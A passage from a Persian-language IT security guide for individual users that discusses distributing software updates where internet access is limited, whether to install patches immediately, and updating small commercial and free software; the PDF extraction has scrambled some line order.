‫‪ISP‬ﻫﺎ ﺑﻪ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻛـﻢ ﻣـﻲﺷـﻮﺩ ﻭ ﻟـﺬﺍ‬
‫ﻫﺰﻳﻨﺔ ﺁﻧﻬﺎ ﻧﻴﺰ ﻛﺎﻫﺶ ﻣﻲﻳﺎﺑﺪ‪.‬‬
‫•‬
‫ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ‬
‫ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫•‬
‫ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۳‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ ﻛـﺮﻡ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺑﺎﻋـﺚ‬
‫ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺭﺍﻳﺎﻧﻪ ﻫﺎ ﺷﺪ‪ ،‬ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ ﺍﻗﺪﺍﻡ ﺑـﻪ ﺗﻮﺯﻳـﻊ ﺑـﺴﺘﻪﻫـﺎﻱ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑـﺮ ﺭﻭﻱ ﺩﻳـﺴﻜﻬﺎﻱ ﻓـﺸﺮﺩﻩ ﺍﻗـﺪﺍﻡ ﻛـﺮﺩ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﻫﻤﭽﻨﺎﻥ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺩﺍﻣﻪ ﻳﺎﺑﺪ‪.‬‬
‫ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺑﺮﺍﻱ ﺁﺳﺎﻧﺘﺮ ﺷﺪﻥ ﻛﺎﺭ ﺷﻤﺎ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﻧـﺪ‪ .‬ﺩﺭ‬
‫ﻛﻠﻴﺔ ﻣﻮﺍﺭﺩ ﻭﻇﻴﻔﺔ ﺍﻧﺘﺨﺎﺏ ﺩﻗﻴﻖ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻣـﻮﺭﺩ‬
‫ﻧﻴﺎﺯ )ﻛﻪ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﺎﺹ‪ ،‬ﻛﺎﺭ ﭘﻴﭽﻴﺪﻩﺍﻱ‬
‫ﺍﺳﺖ( ﺑﻮﺳﻴﻠﺔ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻣﺸﻜﻞ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‬
‫ﻫﻤــﺎﻧﻄﻮﺭ ﻛــﻪ ﻣــﺸﺎﻫﺪﻩ ﻣــﻲﻛﻨﻴــﺪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﺁﻳﻨــﺪﻫﺎﻱ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺩﺭ ﻣﺤﻴﻂ ﻣﺘﺼﻞ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻃﺮﺍﺣـﻲ‬
‫ﺷــﺪﻩﺍﻧــﺪ ﻭ ﺑــﺴﺘﻪﻫــﺎﻱ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﭼﻨــﺪﻳﻦ ﻣﮕﺎﺑــﺎﻳﺘﻲ ﺭﺍ‬
‫‪ download‬ﻣــﻲﻛﻨﻨــﺪ‪ .‬ﻟــﺬﺍ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳــﻦ ﺭﻭﺵ ﺗﻨﻬــﺎ ﺩﺭ‬
‫ﺻﻮﺭﺗﻲ ﻧﺘﻴﺠﻪﺑﺨﺶ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ ﻛـﻪ ﻳـﻚ ﺍﺭﺗﺒـﺎﻁ ﭘﺮﺳـﺮﻋﺖ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻳـﺎ ﺑﺘﻮﺍﻧﻴـﺪ ﺍﺭﺗﺒـﺎﻁ ﺗﻠﻔﻨـﻲ ﺧـﻮﺩ ﺭﺍ ﺗـﺎ‬
‫ﻻ ﺩﺭ ﻛـﺸﻮﺭﻫـﺎﻱ‬
‫ﭼﻨﺪﻳﻦ ﺳﺎﻋﺖ ﺑﺮﻗﺮﺍﺭ ﻧﮕﻪ ﺩﺍﺭﻳـﺪ‪ .‬ﺍﻣـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﺩﻭ ﺭﻭﺵ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﻣﺸﻜﻞ ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪:‬‬
‫‪.۱‬‬
‫ﺍﺯ ﺧﻴــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻧــﺮﻡﺍﻓــﺰﺍﺭﻫــﺎﻱ ﻛــﺎﺭﺑﺮﺩﻱ ﻭ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺑﮕﺬﺭﻳﺪ‪.‬‬
‫‪.۲‬‬
‫ﺍﺯ ﻓــﺮﺩ ﺩﻳﮕــﺮﻱ ﺑﺨﻮﺍﻫﻴــﺪ ﺑــﺴﺘﺔ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺭﺍ‬
‫‪ download‬ﻛﻨﺪ ﻭ ﺟﺰﺋﻴﺎﺕ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻧﺼﺐ ﺭﺍ ﺍﺭﺍﺋﻪ‬
‫ﺩﻫﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺴﺘﺔ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻳﺎ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺗﻮﺯﻳﻊ ﺷﻮﺩ‪.‬‬
‫ﻫﺮﭼﻨﺪ ﺳﻪ ﺷﻴﻮﺓ ﺍﺧﻴﺮ ﺗﻮﺯﻳﻊ ﺑﺴﺘﻪﻫـﺎﻱ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭼﻨـﺪﺍﻥ‬
‫ﺭﺍﻳﺞ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳـﻚ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻣـﺆﺛﺮ ﺗﺠـﺎﺭﻱ ﺑـﺮﺍﻱ‬
‫‪ISP‬ﻫﺎ ﻭ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺗﺒـﺪﻳﻞ‬
‫ﺷﻮﻧﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺍﺯ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺳﺘﻘﺒﺎﻝ ﻣـﻲﺷـﻮﺩ‪،‬‬
‫ﺍﻣﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﻛـﻪ ﻣﻨـﺎﺑﻊ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ‬
‫ﻣﺤﻠﻲ ﻧﻴﺰ ﻗﺎﺑـﻞ ﺍﻃﻤﻴﻨـﺎﻥ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﮔـﺮ ﻣﻨـﺎﺑﻊ ﻣﺤﻠـﻲ ﻗﺎﺑـﻞ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻧﺒﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻣﺮﻛﺰﻱ ﺑﺮﺍﻱ ﺗﻮﺯﻳﻊ ﻭﻳﺮﻭﺳـﻬﺎ‬
‫ﻭ ﺗﺮﺍﻭﺍﻫﺎ ﺗﺒﺪﻳﻞ ﺷﻮﻧﺪ‪.‬‬
‫‪Internet Service Providers‬‬
‫‪31‬‬
‫‪٦٧‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺁﻳﺎ ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺑﺎﻳﺪ ﭘـﺲ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ‪،‬‬
‫ﺳﺮﻳﻌ ﹰﺎ ﻧﺼﺐ ﻧﻤﻮﺩ؟‬
‫ﺍﻳﻦ ﺑﺤﺚ ﭼﻨﺪﻳﻦ ﺩﻫﻪ ﻣﻴﺎﻥ ﻣﺘﺨﺼﺼﺎﻥ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺟﺮﻳﺎﻥ ﺑـﻮﺩﻩ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺩﻭ ﺩﻳﺪﮔﺎﻩ ﻣﺘﻔﺎﻭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﻣﺨﺎﻟﻔــﺎﻥ‪ :‬ﺍﻣﻜــﺎﻥ ﺩﺍﺭﺩ ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ ﻫﻨﮕــﺎﻡ‬
‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﺷـﻮﻧﺪ ﻳـﺎ ﺑﺨـﺶ ﺩﻳﮕـﺮﻱ ﺍﺯ‬
‫ﺑﺮﻧﺎﻣــﻪ ﺭﺍ ﻣﺨﺘــﻞ ﻧﻤﺎﻳﻨــﺪ‪ .‬ﻫﻤﭽﻨــﻴﻦ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺭ‬
‫ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺍﺻـﻠﻲ‬
‫ﺍﺷﻜﺎﻝ ﻭ ﺁﺳﻴﺐﭘـﺬﻳﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﻟـﺬﺍ ﺍﻳـﻦ‬
‫ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﺴﺘﺔ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻣـﺸﻜﻼﺕ‬
‫ﺟﺪﻳﺪﻱ ﺭﺍ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻭﺭﺩ ﻛﻪ ﺑﻪ ﻣـﺸﻜﻞ ﻗﺒﻠـﻲ ﺍﺭﺗﺒـﺎﻃﻲ‬
‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻧﺘﺸﺎﺭ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻛﺸﻒﺷﺪﻩ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﻣﻬﺎﺟﻤﺎﻥ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻧﻔـﻮﺫ ﻛـﺮﺩﻩ ﻭ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺗﺨﺮﻳـﺐ‬
‫ﻣﻲﻛﻨﻨﺪ ﺩﺍﻣﻨﺔ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ‬
‫ﻧﻘﺺ ﺍﻣﻨﻴﺘﻲ ﺍﻋﻼﻡ ﻣﻲﺷﻮﺩ ‪ -‬ﺣﺘﻲ ﺍﮔﺮ ﺍﻳﻦ ﺍﻋﻼﻡ ﺗﻮﺳﻂ ﻳﻚ‬
‫ﻭﺻﻠﺔ ﺍﻣﻨﻴﺘﻲ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ ‪ -‬ﻣﻬﺎﺟﻤﺎﻥ ﺳﺮﻳﻌﹰﺎ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻧﻘﺺ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪ ،‬ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﺔ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺘﺸﺮﺷﺪﻩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻨﺪ ﺳﺮﻳﻌﹰﺎ ﻣﻮﺭﺩ ﺗﻬﺎﺟﻢ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﭘﻴﺸﻨﻬﺎﺩ ﻋﻤﻠﻲ‪:‬‬
‫•‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻣﺒﺘﺪﻱ ﻭ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺸﺎﻥ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻱ‬
‫ﻏﻴﺮﺣﺴﺎﺱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ﺑﺎﻳـﺪ ﻛﻠﻴـﺔ ﺑـﺴﺘﻪﻫـﺎﻱ‬
‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻌﺪ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺑﺮﺍﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺸﺪﻩ‪ ،‬ﺧﻄﺮ ﻣـﺸﻜﻼﺕ ﺟﺪﻳـﺪ‬
‫ﺣﺎﺻﻞ ﺍﺯ ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺑـﻪ ﻣﺮﺍﺗـﺐ ﻛﻤﺘـﺮ ﺍﺯ‬
‫ﺧﻄﺮﺍﺕ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻧﺸﺪﻩ ﺍﺳﺖ‪.‬‬
‫•‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺣﺮﻓﻪﺍﻱ ﻭ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﺶ ﻓﻨﻲ ﺑﺎﻳﺪ ﺑـﺴﺘﻪﻫـﺎﻱ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺳﺮﻳﻌﹰﺎ ﻧﺼﺐ ﻛﻨﻨﺪ‪ ،‬ﺍﻣـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻫﺮﮔﺰ ﻧﻤﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﭼﻪ ﺯﻣـﺎﻧﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻳـﻚ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺍﺯ ﺭﻭﻧﺪ ﺻﺤﻴﺢ ﺍﺟﺮﺍ ﺧﺎﺭﺝ ﻛﻨﻨﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ‬
‫ﺩﻟﻴﻞ ﺍﮔﺮ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺣﺴﺎﺱ ﺗﺠـﺎﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣــﻲﺷــﻮﺩ‪ ،‬ﺑﻬﺘــﺮﻳﻦ ﺭﺍﻫﻜــﺎﺭ ﺍﻳــﻦ ﺍﺳــﺖ ﻛــﻪ ﭘــﻴﺶ ﺍﺯ ﺍﻋﻤــﺎﻝ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﺟﺪﻳﺪ‪ ،‬ﺍﺑﺘـﺪﺍ ﺗﻐﻴﻴـﺮﺍﺕ ﺭﺍ ﺭﻭﻱ ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ‬
‫ﻣﺸﺎﺑﻪ ﻭ ﻧﻪﭼﻨﺪﺍﻥ ﺣﻴﺎﺗﻲ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻏﻴﺮﺳﻨﺘﻲ ﻭ ﻏﻴﺮﺗﺠﺎﺭﻱ‬
‫ﺩﺭ ﺑﺤﺚ ﻗﺒﻞ ﺑﺮ ﻣﺤﺼﻮﻻﺕ ﺗﺠﺎﺭﻱ ﺷـﺎﻣﻞ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ ﻭ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻋﻤﺪﻩ ﻣﺘﻤﺮﻛﺰ ﺷـﺪﻳﻢ ﻛـﻪ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﻣﺤﺎﺳﺒﺎﺗﻲ ﻣﺮﺳـﻮﻡ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﻣـﺎ ﺩﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﺩﻳﮕﺮ ﺷﺮﺍﻳﻂ ﭼﻪ ﺗﻐﻴﻴﺮﺍﺗﻲ ﻣﻲﻛﻨﻨﺪ؟‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ ﻛﻮﭼﻚ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ ﻳـﺎ ﺑـﺎ‬
‫ﺣﺪﺍﻗﻞ ﻫﺰﻳﻨﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺳـﻄﺢ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺗﻔﺎﻭﺗﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﺩ‪ .‬ﺑﻄﻮﺭ ﻛﻠـﻲ‬
‫ﺍﺳــﺘﻔﺎﺩﺓ ﻣﺘﻨــﺎﻭﺏ ﺍﺯ ﺑــﺴﺘﻪﻫــﺎﻱ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺭﺍﻳﮕــﺎﻥ ﻭ ﻳــﺎ‬
‫ﻻ ﺿﻌﻔﻬﺎﻱ‬
‫ﻼ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻛﻢﻫﺰﻳﻨﻪ ﻛﺎﻣ ﹰ‬
‫ﺍﻣﻨﻴﺘﻲ ﻧﺪﺍﺭﻧـﺪ‪ ،‬ﺑﻠﻜـﻪ ﺑـﺮﺍﻱ ﺣـﻞ ﻣـﺸﻜﻼﺕ ﻏﻴﺮﺍﻣﻨﻴﺘـﻲ ﻭ ﻳـﺎ‬
‫ﺍﻓﺰﻭﺩﻥ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺟﺪﻳﺪ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﺑﺮﺧـﻲ ﺍﺯ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕﺎﻥ ﻧﻈﻴﺮ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‪ ٣٢‬ﻭ ﻳﺎ ﻭﻳﺮﻭﺱﻳﺎﺏ‪ ٣٣‬ﺩﺭ‬
‫ﺣﻴﻄﺔ ﺑﺮﺭﺳﻲ ﻣﺎ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﻣـﻮﺭﺩ ﺁﻧﻬـﺎ ﺑﺤـﺚ‬
‫ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺍﮔﺮ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ ﻛـﻪ ﺩﺍﺭﺍﻱ ﻛﺎﺭﻛﺮﺩﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺖ ﻓﺮﻭﺷـﻨﺪﻩ ﺩﺭ‬
‫ﺍﺭﺍﺋﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺩﺭﻙ ﻛـﺮﺩﻩﺍﻳـﺪ‪ .‬ﻣـﺴﻠﻤﹰﺎ ﻧﻤـﻲﺧﻮﺍﻫﻴـﺪ ﺩﺭ‬
‫ﻣﻮﻗﻌﻴﺘﻲ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺣـﺴﺎﺱ ﺑـﻪ ﺍﻣﻨﻴـﺖ‬
‫‪Firewall‬‬
‫‪Virus Scanner‬‬
‫‪32‬‬
‫‪33‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﻣﻮﺍﻓﻘﺎﻥ‪ :‬ﺍﮔﺮ ﺳﺮﻳﻌﹰﺎ ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ ﺭﺍ ﻧـﺼﺐ‬
‫ﻛﻨﻴﺪ‪ ،‬ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺁﺳـﻴﺒﻬﺎﻱ ﺷـﻨﺎﺧﺘﻪﺷـﺪﻩ ﺍﻳﻤـﻦ‬
‫ﻛﺮﺩﻩﺍﻳـﺪ‪ .‬ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻤﻨـﻲ ﺣﺎﺻـﻞ ﺍﺯ ﺑـﺴﺘﻪﻫـﺎﻱ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ‪ ،‬ﺗﺎ ﺳـﻄﺤﻲ ﻛـﻪ ﺳﻴـﺴﺘﻢ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ‬
‫ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺧـﻮﺩ ﺩﺭ ﺑﺮﺍﺑـﺮ ﻧﻔـﻮﺫ ﻭ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺑﻘﻴﺔ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ ﻧـﻮﻉ ﻋﻤﻠﻜـﺮﺩ‬
‫ﺁﻧﻬﺎ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺗﺄﺧﻴﺮ ﭼﻨﺪ ﻫﻔﺘﻪﺍﻱ ﻳﺎ ﭼﻨﺪ ﻣﺎﻫﻪ‬
‫ﺩﺭ ﻧﺼﺐ ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺎﺟﺮﺍﺟﻮ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫـﺪ‬
‫ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﻧﺼﺐ ﻛﻨﻨﺪ‪ ،‬ﻣﺸﻜﻼﺕ ﺍﺣﺘﻤﺎﻟﻲ‬
‫ﺭﺍ ﻛﺸﻒ ﻭ ﮔﺰﺍﺭﺵ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ‪ -‬ﭘـﻴﺶ ﺍﺯ ﺍﻳﻨﻜـﻪ‬
‫ﺷﻤﺎ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎ ﺭﺍ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ‪ -‬ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ‬
‫ﻓﺮﺻﺖ ﺍﺻﻼﺡ ﻧﻘﺎﻳﺺ ﺟﺪﻳﺪ ﺭﺍ ﺑﺪﻫﻨﺪ‪.‬‬
‫‪٦٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
